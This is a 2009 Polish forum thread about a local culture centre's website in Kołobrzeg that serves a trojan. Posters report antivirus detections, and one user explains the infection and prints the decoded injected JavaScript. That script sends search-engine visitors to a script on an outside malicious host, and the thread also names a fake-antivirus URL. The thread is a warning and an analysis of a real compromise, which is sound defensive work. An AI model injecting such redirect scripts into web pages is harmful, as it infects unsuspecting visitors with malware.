uwaga na trojana
report5 - 2009-05-20, 10:56 po wejsciu na stronę naszego rcka złapałem trojana, wywaliłem - pomyslałem ze to niemożliwe no i wlazłem drugi raz i to samo.... ostrzegam i powiedzcie znajomym,. Generał - 2009-05-20, 22:02 Ciekawy jaki to trojan odwiedziłem stronę i wydaje mi się, że nic nie złapałem. Może to kwestia programu antywirusowego, niektóre są przewrażliwione. A swoją drogą jak to się stało, że w RCK pracuje jeden magister? Nieładnie chwalić się (standardowym w dzisiejszych czasach takich instytucjach) wykształceniem, a poziom edukacji pozostałych pomijać. r00t - 2009-05-22, 08:34 Programy antywirusowe tylko dają złudne poczucie bezpieczeństwa... zawsze to powtarzałem i będę powtarzał. Rzeczywiście na stronie rck kołobrzeg było przekierowanie do strony która dokonuje ataków. Przy pierwszych odwiedzinach zamiast właściwego indexu strony ładował się zakodowany skrypt java, który zawierał przekierowanie na stronę hxxp://exodih.cn/?wm=70141 (NIE OTWIERAĆ TEGO!) która uruchamia niby skanowanie komputera i zachęca do pobrania niby antywirusa... Po pobraniu tego pliku użytkownik instaluje sobie na komputerze jakieś świństwo - najprawdopodobniej trojana. Antywirusy mogą go nie wykrywać, bo identyfikacja wirusa najczęściej odbywa się na podstawie cyfrowej sygnatury binarnego pliku. Jeżeli autor jest pomysłowy to przy każdym żądaniu pobierania pliku może np dokonać zmiany w kodzie źródłowym i ponownej kompilacji, co spowoduje że plik binarny będzie miał inną postać... Programy antywirusowe tak naprawdę zawsze są krok do tyłu... Złośliwy kod został usunięty ze strony dosłownie kilkanaście minut temu. report5 - 2009-05-25, 06:49 wir wisi cały czas.... pomóżcie im się z tym uporać , bo jest lekka siara... w sezonie strony związane z Kołobrzegiem mają bardzo dużą oglądalność, - albo to trzeba naprawić albo zamknąć, stan infekcji to zupełny brak odpowiedzialności.,. r00t - 2009-05-25, 07:44 no widzę że jest znowu. No cóż, ktoś nie daje rady z tą stroną. Albo home.pl (co uważam za mniej prawdopodobne) albo administracja strony (co uważam za bardziej prawdopodobne). Trzeba się spiąć i przeanalizować logi serwera, patrząc na datę modyfikacji i nazwę zmodyfikowanych plików. Z tego co wiem administracja strony wini za ten stan rzeczy home.pl ale ja nie jestem przekonany co do słuszności takich oskarżeń. Jak by co mogę pomóc w wytropieniu co się konkretnie dzieje i w usunięciu problemu, administracja strony musiałaby się ze mną skontaktować. report5 - 2009-05-25, 09:29 dzięki, - zadzwonię do Marcina i mu powiem report5 - 2009-05-25, 09:36 no wysłuchałem komunikatu, że dodzwoniłem się do rcka - zapłaciłem za to 40 groszy i na tym koniec - , może jak przeczytają forum to zajarzą, - bo w poniedziałki mistrzowie nie pracują... Deja Vu - 2009-05-25, 16:00 Mistrzowie w poniedziałki nie pracują, ale wirusy jak najbardziej. Tom - 2009-05-25, 16:11 Witam Komunikat o wirusie pojawia się już po wpisaniu w google słów: rck Kołobrzeg Poniżej raport z Kaspersky AV 2009: 2009-05-25 18:08:39 "http://rck.kolobrzeg.eu/" Firefox Zagrożenie: Trojan-Downloader.JS.Iframe.azt Ps. Może się przyda. r00t - 2009-05-26, 07:39 Witam Komunikat o wirusie pojawia się już po wpisaniu w google słów: rck Kołobrzeg Poniżej raport z Kaspersky AV 2009: 2009-05-25 18:08:39 "http://rck.kolobrzeg.eu/" Firefox Zagrożenie: Trojan-Downloader.JS.Iframe.azt Ps. Może się przyda. W tym skrypcie jest sprawdzanie skąd weszło się na stronę. Jeżeli bezpośrednio to nic się nie dzieje, jeżeli via google, msn, czy yahoo (czyli wyszukiwarki), wtedy następuje przekierowanie na host best4you... na którym znajduje się właściwy szkodnik. Tak wygląda złośliwy kod po zdekodowaniu: Kod: Zaznacz całyif (!myik) { var r=document.referrer,u=document.URL,t="",q,que,se="gb"; if (r.indexOf("google.")!=-1) { t="q"; se="google"; } if (r.indexOf("msn.")!=-1) { t="q"; se="msn"; } if (r.indexOf("yahoo.")!=-1) { t="p"; se="yahoo"; } if (r.indexOf("yandex.ru")!=-1) { t="text"; se="yandex.ru"; } if (t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) { que=r.substring(q+2+t.length).split("&")[0]; if ((que.indexOf('site:')==-1) && (que.toLowerCase().indexOf('www.')==-1)) document.write("<script src='http://best4you.if.ua/js/bidch.js?q="+que+"&ref="+r+"'></sc"+"ript>"); } } var myik=true; Moim zdaniem trochę nie na miejscu jest tak długie utrzymywanie takiego stanu rzeczy. Trzeba zbadać i usunąć przyczyny tej infekcji, a nie tylko usuwać skutki.
|